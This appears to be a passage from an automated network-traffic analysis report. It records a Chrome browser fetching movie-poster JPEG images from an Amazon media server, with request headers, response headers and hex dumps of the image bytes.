                                                                                                                                                                                          2024-12-15 11:38:14 UTC1378INData Raw: 8e 8d d1 7d 17 32 23 8e 12 f9 32 68 78 d3 ee 61 51 c8 24 55 75 db b2 e3 35 c6 47 f8 ce 6a c1 b1 70 95 c4 17 75 bc e2 ac 25 e6 c1 0b 54 9c 30 49 2b c8 6f ef 7e 09 06 de 08 48 8d e3 6e 23 6c 6e 23 1b 73 e6 ad 24 1c e8 a8 52 c4 65 1f 52 c9 b7 41 09 ab bb 7e 6d ea 2d 5f ca 60 82 69 2b 7c f2 0f 9e 2e 2d 12 20 e7 b7 1d 83 f8 b7 1d 1f c2 57 92 ed f7 cf cf ba f1 4c 8c fe a8 e0 58 ce 46 bf d6 84 6e 04 54 12 73 63 46 d2 6b c8 60 f5 b7 17 27 f0 f0 8c ac a0 35 49 13 73 ee 11 2d a1 e4 c6 89 53 cf 8b ab 58 ea fd 37 db ce 2a d0 e6 48 08 65 dc 08 ae 00 f9 b7 d9 57 97 5f 08 f1 3b 3a 2c 8b b5 a6 82 4b 16 12 2d b5 f4 77 1d 83 c2 1f d5 c6 08 8c da 35 37 1b b5 53 4a e1 da 56 58 b8 9c b0 20 8d 67 b9 9e e5 94 93 6e 1b d5 58 fb ab 77 2c 23 64 6f ce 9b f2 24 09 1f 8a b5 38 9a 1d
                                                                                                                                                                                          Data Ascii: }2#2hxaQ$Uu5Gjpu%T0I+o~Hn#ln#s$ReRA~m-_`i+|.- WLXFnTscFk`'5Is-SX7*HeW_;:,K-w57SJVX gnXw,#do$8
                                                                                                                                                                                          2024-12-15 11:38:14 UTC1378INData Raw: c9 78 9f 5d aa 21 99 df 5b 5f 07 ec af 72 2a e3 7a 77 16 31 e7 32 9c 53 0d de 5e 3d d9 ae 2a df 2a 0a bb b1 36 a9 0b 34 1b a5 09 89 78 04 bd ca 78 ac d7 c6 cc 63 e5 50 ed e3 9d 4b ba 5e ca 13 bf 7a e1 2b f4 ce d4 f0 31 ff 00 c8 06 2e 05 42 f8 38 a4 b7 17 24 23 5f 34 4d 0b 42 6c 11 23 89 22 4b bf cb 35 4a 82 3e ea 20 76 ef 5f 0a d5 1c 7b 07 5f f5 a6 76 f7 a9 a5 32 1a b4 ec 8a 3a 38 af 85 ae 2f c3 5a ed e1 2b 61 70 91 29 05 af 93 f8 1e 0d f1 47 9a 2d b8 6c 16 fe 9e 21 68 79 b2 b4 3a 44 a4 f7 d2 da df e2 1c 25 6d 19 11 2f ff 00 b7 9f e7 61 99 6d 4e ee f1 8e dd 94 63 b5 01 e0 86 ff 00 c9 8e 70 6b 9a de 28 b1 35 6b e0 fd 97 f0 6a d9 37 36 6a 31 8d 5d ea e5 83 ee a9 ef a3 86 30 ed f1 7f 2f c9 69 7e d2 3e c9 16 67 4e cb 6e 4d ca 9d f7 57 42 d1 28 54 71 ef f3 9d
                                                                                                                                                                                          Data Ascii: x]![_r*zw12S^=**64xxcPK^z+1.B8$#_4MBl#"K5J> v_{_v2:8/Z+ap)G-l!hy:D%m/amNcpk(5kj76j1]0/i~>gNnMWB(Tq
                                                                                                                                                                                          2024-12-15 11:38:14 UTC1378INData Raw: 68 b5 2d 14 dc 2e 8d 7e 6d b5 08 8d 6b fa 6f a8 b1 32 2e 93 ab fa 2b c4 73 7d a1 5b 6a 11 85 94 f8 6e db ba 69 fc 37 6f a7 a9 e5 df e8 91 6a 10 72 a4 6f 0f 6f 83 61 74 ae 19 4d 39 4b 1f 2d 7a cb 91 a8 b9 16 5a 93 59 5d 47 70 ba 8f 11 dc 6a 2c 39 9c 3f a3 b4 f3 34 ef 2c 26 29 1a 32 fe 20 24 76 b1 24 3a 9d a3 c8 22 d4 95 6f e7 48 9a 04 d1 b4 19 6e 6e 63 98 b4 6a ea 51 ad f8 12 c6 13 b9 d5 02 a8 55 f2 32 a8 ee 6e 10 77 59 d5 ce 07 97 13 d9 6e 86 1b 91 5a 2e 81 6f 7e cf ce 86 d2 38 23 11 c5 a9 f0 e5 d4 9a 8c de 9e 1f 0f ef 5f ac b6 3a 18 b5 b5 f4 b2 0e 1f d3 91 b7 50 d8 8b f1 37 df f3 d7 54 b7 0c 84 00 d3 91 18 7a 4b 96 62 41 18 cf ca 4d b9 1b 61 27 77 9e a7 65 ea 6c 27 8b cb 48 d4 fd 25 f4 6e 64 9d c3 10 39 92 2e 0d 7a a7 24 54 ae c1 cd 0c 67 e4 03 6d 35 02
                                                                                                                                                                                          Data Ascii: h-.~mko2.+s}[jni7ojrooatM9K-zZY]Gpj,9?4,&)2 $v$:"oHnncjQU2nwYnZ.o~8#_:P7TzKbAMa'wel'H%nd9.z$Tgm5
                                                                                                                                                                                          2024-12-15 11:38:14 UTC1378INData Raw: 64 53 c2 78 b7 c6 7f e1 7d 49 02 8a 6d 46 46 f8 ff 00 b7 ea bf d7 54 6b aa 35 d5 57 54 6b aa 35 d5 1a ea 8d 75 46 ba a3 5d 51 a5 9f 75 19 f1 5d 55 06 c8 cf 61 f8 3c 4b 56 68 1e 02 16 23 23 92 d4 b0 00 3d cc 4a 6b 15 1d 1f 9a 35 1f 80 ec 3f 07 81 e0 10 9a d8 d5 1c 24 f9 76 35 b8 fe 04 03 e1 d0 7c 8a 8f c0 76 62 ba 74 ae 42 57 48 77 50 5c 7b 00 b4 47 04 89 9c 90 a9 62 a4 0d f2 42 63 72 87 84 87 db 1c 23 f0 1f 81 62 66 f1 dc 28 9e 10 ca 13 e5 2e 0b 48 c9 57 16 af 24 8b b6 6b 06 84 02 cb 23 7c 12 72 78 47 e0 3b 77 35 61 f1 9a cb 55 94 22 6c ac b7 de 95 88 41 cf b4 fb e8 6e fe c5 0e fd c0 c7 6d 86 2f 4c 72 15 6a eb 26 63 5b 09 61 80 32 d5 f6 b8 35 1f 80 ed 02 89 f7 02 8e 6a 0b 8d 8e 2a df 50 c8 c5 6a 56 d1 a4 8a f1 c1 a7 5c 5c 9d b0 7d 0e ee 1b 75 37 09 a6 cc
                                                                                                                                                                                          Data Ascii: dSx}ImFFTk5WTk5uF]Qu]Ua<KVh##=Jk5?$v5|vbtBWHwP\{GbBcr#bf(.HW$k#|rxG;w5aU"lAnm/Lrj&c[a25j*PjV\\}u7
                                                                                                                                                                                          2024-12-15 11:38:14 UTC1378INData Raw: 85 12 d7 2a 33 70 63 7c 72 22 1e 1e 15 59 0d 0d b4 d7 8a d0 d7 03 be 8c d6 bf 95 15 38 ec 8d 19 c3 ed 46 6c b4 1f 9a 25 84 1b d9 f8 a2 6c c0 ea f8 a2 58 48 eb af ad 10 3e fc d3 d1 17 e8 8d 1e 36 ec 12 d6 8b da 6a 74 4c 4b f1 0e a2 9d 42 d5 ea 6c c7 26 c8 ea 81 a5 b2 e1 21 20 e2 99 52 65 a8 71 dd 46 7b 2d 8e 74 59 c2 2a ba 2c 8e a8 51 2c 27 1a fa aa c3 5d 79 51 98 59 3c a8 cf e2 3e 28 9d 5a 47 6e a4 3b 44 13 ce 92 83 b2 30 85 d6 1f 12 c2 01 f9 51 c6 6a d3 95 51 7e df b5 3a 0e b9 6f 50 1e ee 96 f0 52 14 7f c6 cb f7 d3 9a d1 ea 10 79 e1 a6 c5 30 7e 0f 5d 74 49 3c 9b e8 9b 64 01 44 c4 b5 26 a7 50 89 58 3c 5b da e8 8b c9 3a 3e 82 b7 8e 79 52 0a 78 4e 0a ce 10 a0 cd d0 10 95 e8 38 58 a6 47 f1 81 da 17 c8 b8 d2 5d 75 65 40 0f 4b 36 52 3c 80 f3 60 0f 58 23 b5 9e
                                                                                                                                                                                          Data Ascii: *3pc|r"Y8Fl%lXH>6jtLKBl&! ReqF{-tY*,Q,']yQY<>(ZGn;D0QjQ~:oPRy0~]tI<dD&PX<[:>yRxN8XG]ue@K6R<`X#
                                                                                                                                                                                          2024-12-15 11:38:14 UTC1378INData Raw: ea 9f 36 ef 42 73 15 87 41 ad 8b dc 68 27 cc b7 91 5d ba 28 be 03 aa 13 02 35 75 d1 6a aa 57 d4 fe 81 57 5d 8b 5f 5c 8f 63 3b e2 88 73 4d b7 c5 07 ee f9 52 b2 48 bf 4c 7e 53 b6 7d d1 2d 1d bb 90 69 c2 70 3b e9 6b 15 92 46 31 50 0c 96 23 60 91 76 a5 e9 22 0a de 20 74 55 16 fa 53 6f 94 d4 16 8e b4 4b 8a ae 6a d4 d7 89 b0 fc 4a c6 b5 e2 25 91 dd 88 b3 fe 1f 34 b6 71 5d 2e e3 4c 74 2a a8 ce 25 ed 58 ea 87 1b 95 ea b6 06 b9 d0 de 20 39 c6 5c 96 10 07 86 44 f4 26 c3 78 82 ad aa d1 fc 42 ac f6 3c ca a8 b3 22 f8 2a a0 d5 c1 42 f7 3e ae 49 e4 ff 00 89 77 24 de 28 6e 6f 0f 6b 4d 91 4c 3c fb 8f 88 a6 0f f4 c5 60 78 7f 13 b5 e4 c2 d3 72 0e 65 80 1e 3f 8b 3c cf ca bd 43 db 77 75 a9 0d ea 1a 3a 49 40 fe d6 b5 2f b6 85 b6 b5 24 51 56 f9 36 2a b2 6c 47 d4 cc 05 66 09 87
                                                                                                                                                                                          Data Ascii: 6BsAh'](5ujWW]_\c;sMRHL~S}-ip;kF1P#`v" tUSoKjJ%4q].Lt*%X 9\D&xB<"*B>Iw$(nokML<`xre?<Cwu:I@/$QV6*lGf
                                                                                                                                                                                          2024-12-15 11:38:14 UTC1378INData Raw: dc 93 c3 45 64 9e c5 99 5e 4c 46 ac cd 10 03 03 40 87 8a 9e f5 12 42 65 6e a9 9b f3 a7 d1 a2 8c 1f c0 c3 f8 96 12 d8 de b2 e1 fa 65 03 da 69 b7 8f 91 f9 fe 94 cf 5c ce f1 f9 56 7c d3 08 c1 90 c8 6d cd 6c 79 d2 81 38 10 0c 07 a2 51 b7 28 49 2b 8a 63 9b 9d f5 6b 55 2e ba 33 77 5c 0d a8 88 69 fd de f5 18 0b a0 12 86 d4 c6 23 b3 f3 51 44 7c c8 59 32 7a 74 56 07 f0 30 f5 e4 1b ac 02 57 6c d2 f2 de a1 68 d2 e6 02 e4 5f 6a c2 9c bf 39 03 c3 4b 43 e8 e2 6c 76 0a 59 e1 9b aa 95 87 94 cd 9e e1 44 0f 2d e5 69 ee bc 04 d4 ee c0 ba 05 06 60 20 31 16 c4 76 71 3c 20 7b 27 bd af 8a b0 17 25 ff 00 07 2a 0d 5d be 59 1e cc f6 53 03 26 8f e3 67 9d 3f c7 48 7d cf 95 2b 19 d1 43 e5 5b 9c bc e3 d3 a2 b0 3d 11 dc f3 45 ff 00 80 91 93 6f 6a 54 f6 74 05 d7 61 36 b1 3c ef 51 c2 5c
                                                                                                                                                                                          Data Ascii: Ed^LF@Benei\V|mly8Q(I+ckU.3w\i#QD|Y2ztV0Wlh_j9KClvYD-i` 1vq< {'%*]YS&g?H}+C[=EojTta6<Q\


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          114192.168.2.1649850151.101.193.164436700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-12-15 11:38:14 UTC692OUTGET /images/M/MV5BMGRlOWYyZjItMzMwZS00ZTA5LTliYWUtZWQxZTllOTQ1Y2VlL2ltYWdlL2ltYWdlXkEyXkFqcGdeQXVyNjc1NTYyMjg@._V1_SX300.jpg HTTP/1.1
                                                                                                                                                                                          Host: m.media-amazon.com
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                          Referer: https://fsharetv.co/
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          2024-12-15 11:38:14 UTC615INHTTP/1.1 200 OK
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Content-Length: 36697
                                                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                                                          X-Amz-IR-Id: 8a245f5e-a67e-4d95-ac13-56cf4bdf5752
                                                                                                                                                                                          Cache-Control: max-age=630720000,public
                                                                                                                                                                                          Last-Modified: Mon, 19 Dec 2016 19:41:17 GMT
                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                          Expires: Mon, 05 Dec 2044 05:22:22 GMT
                                                                                                                                                                                          X-Nginx-Cache-Status: MISS
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          Age: 454552
                                                                                                                                                                                          Date: Sun, 15 Dec 2024 11:38:14 GMT
                                                                                                                                                                                          X-Served-By: cache-iad-kjyo7100120-IAD, cache-ewr-kewr1740068-EWR
                                                                                                                                                                                          X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                          Server-Timing: provider;desc="fy"
                                                                                                                                                                                          alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                          2024-12-15 11:38:14 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 01 c6 01 2c 03 01 22 00 02 11 01 03 11 01 ff c4 00 36 00 00 01 04 03 01 01 00 00 00 00 00 00 00 00 00 00 07 04 05 06 08 00 02 03 01 09 01 00 02 03 01 01 01 00 00 00 00 00 00 00 00 00 00 03 04 01 02 05 06 00 07 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 b3 bb 64 4d 37 25 fb 8a b7 13 65 3f
                                                                                                                                                                                          Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*,"6dM7%e?
                                                                                                                                                                                          2024-12-15 11:38:14 UTC1378INData Raw: f6 8f 24 a7 d7 16 b5 d6 d5 bb 9a d4 7a 0e cf 1c c7 45 25 ee cd ce 6c 5c 15 05 a5 c5 f0 81 2f 2f 84 47 d8 6b a1 26 85 33 2f 7f 31 b2 13 25 66 f6 93 ff 00 54 6a 33 ba 2b b0 e2 81 c7 57 88 58 18 33 81 86 eb a9 8d b5 c1 35 53 0f 45 23 e7 19 bd 90 0a de fc 54 20 f7 96 9a 5c 65 af b5 1f bc 74 6e d5 bc 6c af fc d3 9a 79 70 a8 ad ea 72 b0 26 e5 3a 7a a3 f8 97 8d 07 a6 39 9a e6 20 7a b9 10 66 50 f4 9e 92 34 0e c3 d1 62 b0 d0 65 c3 41 19 43 24 aa 7b af ce 01 f8 4f 20 35 39 9e 0e b3 9e 5f 4e b9 7c 7e 48 a6 cd e1 58 91 5b dc 9a e0 01 f8 17 56 0f 29 d8 5d f3 43 58 8d 30 a1 ee b0 ed af 30 81 b7 0c c2 69 47 41 d6 ca c7 7a d9 63 fb 65 1f 7f 38 aa b5 68 5d f7 a0 77 b7 4e 8a aa a5 ac a7 00 bd ba 04 3e 20 ad de db 41 af 4b 6b 28 80 21 eb 6d 26 a1 fc 8e 3f ad cd af 9b 46 d7
                                                                                                                                                                                          Data Ascii: $zE%l\//Gk&3/1%fTj3+WX35SE#T \etnlypr&:z9 zfP4beAC${O 59_N|~HX[V)]CX00iGAzce8h]wN> AKk(!m&?F
                                                                                                                                                                                          2024-12-15 11:38:14 UTC1378INData Raw: f9 84 32 27 81 d0 89 8b 26 7f 5e c0 af 5e 1a 5c a9 a0 51 19 7e 81 11 97 34 ac c4 ed f6 f7 4e 64 a2 ac e1 ad d7 55 a2 7c f5 ba 6d c3 4f 4f 6e a9 f6 13 4a 66 b0 39 d7 b3 e6 75 b0 f4 27 67 2e 37 2a 91 6a b6 c3 0f 47 7d 28 56 8c e2 90 b0 b7 c8 9c c6 68 78 1e fa 9d 9e 72 0b a7 bc 91 ed ad 6b b3 73 96 ff 00 cc 16 05 0d a1 41 be 16 6b 78 cc 9f a0 c1 3b 3a c5 b4 b8 ff 00 16 c5 65 a6 4e 6f db 9f 5c 6e df cc db 5f 5b 6e 7b e5 d6 f7 5c f7 de f3 a7 9e d6 fa ef e7 4a 16 38 4c 84 cc 1b e6 e5 cd 81 ab 14 6c ce 10 c3 cd 4a f3 12 36 41 b2 06 02 b5 ab 91 35 84 79 12 d7 be 66 6b 07 a5 e0 72 a1 d4 50 dd 2c 62 ca ec ad 6a d4 ca b7 be 6e ac 2e 67 0b 8b 44 39 b7 1e b8 ff 00 40 d2 0d 3f e3 74 83 b2 ec 41 a9 cb 17 5c e6 d2 1c ed 21 5e c4 88 cc d1 9d 18 dd 85 a4 4d 6a 20 ec 96 a9
                                                                                                                                                                                          Data Ascii: 2'&^^\Q~4NdU|mOOnJf9u'g.7*jG}(VhxrksAkx;:eNo\n_[n{\J8LlJ6A5yfkrP,bjn.gD9@?tA\!^Mj
                                                                                                                                                                                          2024-12-15 11:38:14 UTC1378INData Raw: 8f a3 02 37 ce 5d 3b 2c 70 79 0a 03 de 0f 63 cc 21 26 6a b0 b1 08 1a b3 61 a2 26 ce fd c3 95 0e 1a c3 6e 32 e7 ed da e3 8e 8a 3e 8a d9 7a b2 b5 4a dc 93 e9 c0 10 aa df 14 5c 75 7e f1 22 3d ab c4 26 9b 29 8b 3f 75 5f 4e e3 55 e9 31 0b 73 46 af 82 cc 91 44 4d 33 2d 47 11 90 66 43 fc 33 f0 77 43 ea 76 65 2b e5 f0 b4 ed 39 dd 98 93 b1 53 3d a5 61 e2 8e 4e b1 dc 29 dd d9 5c 55 75 4d 8d 81 f1 ed 31 b3 22 b4 02 19 52 cd 97 6c 6a 00 ef d5 df 80 21 55 be 28 b8 ea dd e2 56 f3 bb 85 6a b2 59 7d b1 e4 99 73 c9 90 dc fe c2 71 2e 18 55 87 03 21 39 cf 24 7d 1a 4b 12 1e e1 3c 23 90 cb a3 b2 7e 89 dd 3b aa a3 92 77 58 c1 31 2a 96 48 e3 e9 74 4a 66 f5 34 fd 82 77 bf 5e 36 c4 72 93 cc fb 8e 33 e9 d1 a0 62 ea 9a 2d ad e8 99 ca 3e 84 59 18 9f 3c 22 07 74 c1 85 5b e2 8f 8e ab
                                                                                                                                                                                          Data Ascii: 7];,pyc!&ja&n2>zJ\u~"=&)?u_NU1sFDM3-GfC3wCve+9S=aN)\UuM1"Rlj!U(VjY}sq.U!9$}K<#~;wX1*HtJf4w^6r3b->Y<"t[
                                                                                                                                                                                          2024-12-15 11:38:14 UTC1378INData Raw: 59 d3 a6 55 dc 8d 8a 16 69 b9 2c cc 0f 9c be 5d f1 d5 41 58 e5 ea 30 55 08 51 c8 c2 8a 74 52 f4 5c ed dd 15 fe e2 85 0b a6 55 fe 38 f8 32 d5 fb c4 ba f4 61 ab a5 04 78 39 73 c3 2b 56 d3 5a d8 39 8f d3 93 39 4b 23 3a d5 03 99 56 66 5f 4c c9 e9 98 38 6b 03 be a4 8b e9 a2 f4 4c 3c 47 1d 78 7d 4b 17 c2 69 db 2b 09 9d 43 30 7c 85 1e 9d 2c bd 5e 1a 11 43 d5 e4 99 1d 87 74 72 65 14 a2 3d dc 8a 6e d0 90 65 c0 67 6f ec 53 26 55 fe 38 f8 eb 1f a9 68 f5 fa 78 82 52 ca 10 0b 99 d7 d6 6b ce 7b 1b 0a c6 ab 5e b7 bb 4f 97 6d ae 78 92 db bd 9c 5f 42 91 e0 b2 c2 ee ac 87 32 19 45 7d 37 2f f3 18 a7 4d 7d 9d dd 94 9a 86 c5 2e af fd 49 e2 ad 08 bc b2 d4 75 e4 04 fd 83 40 c7 ba 1a 31 c1 d9 e4 c2 29 1d 4d 65 99 4b 69 15 d7 ff 00 5d c7 dd 13 bb f7 12 70 76 76 93 12 03 48 c8 78
                                                                                                                                                                                          Data Ascii: YUi,]AX0UQtR\U82ax9s+VZ99K#:Vf_L8kL<Gx}Ki+C0|,^Ctre=negoS&U8hxRk{^Omx_B2E}7/M}.Iu@1)MeKi]pvvHx
                                                                                                                                                                                          2024-12-15 11:38:14 UTC1378INData Raw: 4e 48 a6 94 22 ea 73 6b f5 62 ed a8 db 6b 93 3c ad c1 93 f0 af f1 82 24 0a bf c5 1f 1d 67 f5 2d 38 f6 5a 89 12 15 aa 07 87 ba 4e 82 33 96 41 88 07 44 95 fd d7 b4 86 86 09 0d 69 92 f3 6a c2 48 55 87 e4 6a 99 44 b5 08 b9 d5 a6 15 a1 7f d4 04 2b 5b 06 2b b8 5a 26 20 9d c1 38 ad 53 23 0f 31 8e ec 00 2c 65 63 ea 28 03 e3 b1 ac 5b 99 9d d3 be 7a f0 22 72 7c bf da ef c2 b7 c4 09 d0 2a ff 00 14 7c 75 9f d4 8d dc 70 4c 26 d2 8b 10 b3 ad 63 4e f1 81 91 d2 21 96 59 a3 32 25 ae 1e ca 86 be 9e 3d d5 b0 99 7d 46 1b 2c 31 34 32 b5 80 09 06 49 e3 87 e4 d1 c5 a3 aa 0a 5d 56 ac 3d ed 59 1b 57 39 80 32 14 25 1c a3 36 b5 6e 6f 6b c1 24 cf 99 7c 10 a1 84 07 b5 e2 f4 33 7f c7 5b e2 14 fd 10 3a af f1 47 c7 59 fd 5c 34 49 fa 15 77 76 59 5b d0 b2 fa 86 ef 36 46 88 74 8b 71 d0 e7
                                                                                                                                                                                          Data Ascii: NH"skbk<$g-8ZN3ADijHUjD+[+Z& 8S#1,ec([z"r|*|upL&cN!Y2%=}F,142I]V=YW92%6nok$|3[:GY\4IwvY[6Ftq
                                                                                                                                                                                          2024-12-15 11:38:14 UTC1378INData Raw: bd 30 cc 51 ba 78 d1 60 3b d9 b1 cb 0d ed 36 ac 1f e9 e6 93 74 5a 55 92 97 9a 27 3e a0 03 d1 aa 4f 2f 34 49 4b 71 ff 00 1c f9 24 5e ce b2 42 dd c9 6a 52 6e 9c d3 4a 58 66 6d 24 f9 72 14 ce 5a cc 9f 89 01 e7 27 29 21 aa f9 f4 3d 19 31 93 1a 2e 5d 10 e9 c0 dd f5 48 06 02 ac 60 ad 49 92 da 83 51 21 66 51 5a 72 9c 1d 1f 67 51 fb 47 8e b1 fa be d9 47 2c 80 14 16 02 18 63 17 93 50 26 6d e8 2d c5 0b 36 6d 6a 5b e3 38 c6 b6 85 29 61 d3 e8 0f bf f9 07 45 80 bd cd 11 73 39 68 a9 03 8b ec ac ec 31 80 3d e9 88 20 dc 02 fb 49 89 4f a8 0c 31 6e 8e 9b 09 ca db e7 0e 59 93 2a 15 5c a2 67 54 ab c1 ce 06 5e 98 59 4c 71 11 75 ae e0 79 da 0f 27 47 0e 5d 82 ef ad 8b f8 57 74 53 34 60 46 ac c6 de e5 95 a7 8e e9 87 24 59 41 ed 1e 3a c7 ea e1 b5 6d 4c c9 9b 0b 09 8d b1 1b 2b 24
                                                                                                                                                                                          Data Ascii: 0Qx`;6tZU'>O/4IKq$^BjRnJXfm$rZ')!=1.]H`IQ!fQZrgQGG,cP&m-6mj[8)aEs9h1= IO1nY*\gT^YLquy'G]WtS4`F$YA:mL+$
                                                                                                                                                                                          2024-12-15 11:38:14 UTC1378INData Raw: 7e c8 eb a3 3a c1 c1 14 24 51 8d e5 f8 cb d6 62 68 cb ca aa ed 37 17 51 23 2f a8 ec 92 56 1a b2 46 b3 ac 26 b8 8f be 92 dd 04 ed 24 b4 5b 22 ab 34 db e3 0f 43 03 cb 41 d1 c0 1b 12 42 50 e8 ba f1 94 ae 4c 38 ef 07 c5 72 46 d2 02 6f 9e d5 88 e5 2c bd c8 cf 1b bd 3c 57 45 93 38 f7 aa eb 29 75 45 af ca 19 e3 97 ee 6f 77 52 d4 7d c8 5d 05 15 78 eb 11 2f d8 ba bb 98 64 82 50 78 91 1a 22 e5 58 78 44 b9 1e 94 64 52 8e 39 39 0d b3 96 fd 2f 1b 65 8f 8e f0 7c 57 2c 1f d0 d8 63 8e e4 1c 5d 12 fd 61 c2 3f c6 da b4 eb f7 33 da 5a e1 11 0b 51 9f d7 20 bd 56 05 e3 1a 75 72 19 d9 df ac 4a e3 4a b5 ed 15 e2 16 15 5f 12 4b 5a 14 5e 72 c3 69 24 40 ea 9d 5d e4 b2 d0 24 72 10 be 5e 4d e5 b3 b7 8d 72 72 40 de 03 e9 19 60 7e 86 c8 e6 78 db 92 47 62 c1 00 bc f2 5a e3 b4 fc 74 c7
                                                                                                                                                                                          Data Ascii: ~:$Qbh7Q#/VF&$["4CABPL8rFo,<WE8)uEowR}]x/dPx"XxDdR99/e|W,c]a?3ZQ VurJJ_KZ^ri$@]$r^Mrr@`~xGbZt
                                                                                                                                                                                          2024-12-15 11:38:14 UTC1378INData Raw: ed d1 b9 62 94 85 41 d8 5a 8c 06 10 f9 65 a8 c7 5c af e5 45 94 03 5b 62 66 fa cf fe c4 b9 4a e9 ad 64 4c 2c 5a 79 e4 ec 40 19 db 9c 08 4b 1e b0 e8 6f 4f fc 20 f0 1b 0c 47 af 5b c5 29 57 e0 e5 dd 1b a1 2c 9f 8e 01 b8 46 8b e6 ee ac dc 2f 00 03 ee eb 2d 65 63 91 96 8c 7a 6c f1 75 3c 8a b6 08 20 66 b9 94 ae 4f fe c4 b9 ad a0 b6 ae a5 76 7f 04 b8 ad c2 43 e0 53 9f bb 0f 81 d5 43 cc b0 ea 2a c0 3f 49 98 22 96 33 f9 5c ee cc 60 d7 79 0c d6 25 f4 a5 db de 11 d7 30 a9 83 df 15 7e 46 55 4a cf 20 e3 23 8c 7c 9d ec c0 a9 37 ca ec 0a 81 9e 99 23 ae 23 14 6c d4 3b b1 19 38 ff 00 b1 36 69 3f b4 87 2f 79 8c f0 ce d0 c7 17 9f 91 c0 9a 1f 36 a5 21 e1 a3 bd 14 c3 b4 5b 19 fa d3 93 1c 28 7c 83 63 2d 69 04 b1 da be f6 58 cc ef 3f 19 56 23 21 1c cb 3b 47 31 e8 b6 a1 65 0d 97
                                                                                                                                                                                          Data Ascii: bAZe\E[bfJdL,Zy@KoO G[)W,F/-eczlu< fOvCSC*?I"3\`y%0~FUJ #|7##l;86i?/y6![(|c-iX?V#!;G1e
                                                                                                                                                                                          2024-12-15 11:38:14 UTC1378INData Raw: 47 58 ab 78 54 f3 d3 32 9a ff 00 e3 b6 e4 35 81 e2 3a d1 21 97 13 c6 75 ca e5 c4 70 47 12 f5 8b 9c ed 9b 1b 7f 88 bb 3c df 0e df 37 1f 0f 50 06 eb 9e 39 60 26 cd 01 58 fa de 24 cd f7 e4 cd 32 f3 b2 88 63 6f ac 42 fd 04 fe 49 0c a0 07 87 67 52 35 2f 14 72 19 23 47 cb 27 af 46 31 5a 98 d8 41 86 e4 ab fc 62 12 49 27 c2 ed bf 42 a4 d2 e1 8b 8a c5 ce 46 79 77 f8 4f 21 59 01 ca 1b 0f 46 78 6c 00 aa fd 65 12 8f d6 93 34 a3 f7 38 72 e3 ca 2c bf 26 3f 76 26 9d 8e c5 a0 68 38 10 45 8f b5 88 96 46 1b 08 b9 60 a3 61 14 4c a2 48 f7 75 47 1e 9c 73 89 10 38 f2 19 fa d0 e8 2c a0 5a e1 01 c8 0f 25 cf c2 75 f9 b9 ca ae 7d d4 e9 ee 7a da d8 1b 26 1f ad 26 69 8f ee 70 66 cb 64 b2 d8 66 8f d7 e1 72 9d cf d7 40 d0 7d 98 f2 6a b1 fa 6c c4 df 48 c3 64 86 18 9c 29 8b 59 5d d4 f0
                                                                                                                                                                                          Data Ascii: GXxT25:!upG<7P9`&X$2coBIgR5/r#G'F1ZAbI'BFywO!YFxle48r,&?v&h8EF`aLHuGs8,Z%u}z&&ipfdfr@}jlHd)Y]


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          115192.168.2.1649855151.101.193.164436700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-12-15 11:38:14 UTC676OUTGET /images/M/MV5BMmRkMTVlNTEtOWQxNC00OGY4LWIzMzQtMjY2MTZjNDU2N2ViXkEyXkFqcGdeQXVyNjMwMjk0MTQ@._V1_SX300.jpg HTTP/1.1
                                                                                                                                                                                          Host: m.media-amazon.com
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                          Sec-Fetch-Site: cross-site
